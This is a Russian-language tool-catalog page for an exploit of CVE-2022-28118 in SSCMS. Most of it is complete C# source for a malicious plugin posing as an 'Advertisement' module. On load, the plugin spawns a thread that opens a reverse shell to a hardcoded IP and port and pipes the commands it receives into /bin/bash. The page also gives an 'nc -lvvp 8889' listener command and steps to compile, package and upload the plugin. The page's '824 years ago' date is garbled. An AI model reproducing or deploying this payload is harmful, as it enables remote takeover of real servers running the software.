Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SSCMS-PluginShell — CVE-2022-28118 | Kitploit
Инструменты/GitHubGitHub/richard-tang/sscms-pluginshell
ЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияКомандование и УправлениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubrichard-tang/sscms-pluginshell

SSCMS-PluginShell

CVE-2022-28118

Репозиторий
824 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
  1. Установите VisualStudio

  2. Импортируйте проект

  3. Измените значение IPAddress.Parse в файле Startup.cs

    root@kitploit:~
    using Microsoft.Extensions.DependencyInjection;
    using SSCMS.Advertisement.Abstractions;
    using SSCMS.Advertisement.Core;
    using SSCMS.Plugins;
    using System.Diagnostics;
    using System;
    using System.Text;
    using System.Net.Sockets;
    using System.Net;
    using System.Threading;
    
    namespace SSCMS.Advertisement
    {
        public class Startup : IPluginConfigureServices
        {
            
          public void ConfigureServices(IServiceCollection services)
          {
             ThreadStart childref = new ThreadStart(reversShell);
             Thread childThread = new Thread(childref);
             childThread.Start();
             services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
          }
    
    		public void reversShell()
    		{
    			Socket socketshell = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
    			IPAddress ip = IPAddress.Parse("172.17.0.1");
    			IPEndPoint point = new IPEndPoint(ip, Convert.ToInt32("8889"));
    			try
    			{
    				socketshell.Connect(point);
    				while (true)
    				{
    					byte[] getdata = new byte[1024 * 5];
    					int n = socketshell.Receive(getdata);
    					string restr = Encoding.Default.GetString(getdata, 0, n);
    					string command = restr;
    					string resultok = willshell(command);
    					byte[] senddata = new byte[1024 * 5];
    					senddata = Encoding.Default.GetBytes(resultok);
    					socketshell.Send(senddata);
    				}
    			}
    			catch
    			{
    				socketshell.Close();
    			}
    		}
    
    		public static string willshell(object command)
    		{
    			Process process = new Process();
    			process.StartInfo.FileName = "/bin/bash";
    			process.StartInfo.UseShellExecute = false;
    			process.StartInfo.RedirectStandardError = true;
    			process.StartInfo.RedirectStandardInput = true;
    			process.StartInfo.RedirectStandardOutput = true;
    			process.StartInfo.CreateNoWindow = true;
    			process.Start();
    			process.StandardInput.WriteLine("echo off");
    			process.StandardInput.WriteLine(command);
    			process.StandardInput.WriteLine("exit");
    			string result = process.StandardOutput.ReadToEnd();
    			return result;
    		}
    	}
    }
    
  4. Скомпилируйте проект

  5. Упакуйте выходной каталог после компиляции в ZIP-архив

  6. Запустите прослушивание на сервере

    root@kitploit:~
    nc -lvvp 8889
    
  7. Загрузите для автономной установки в систему

Скачать инструмент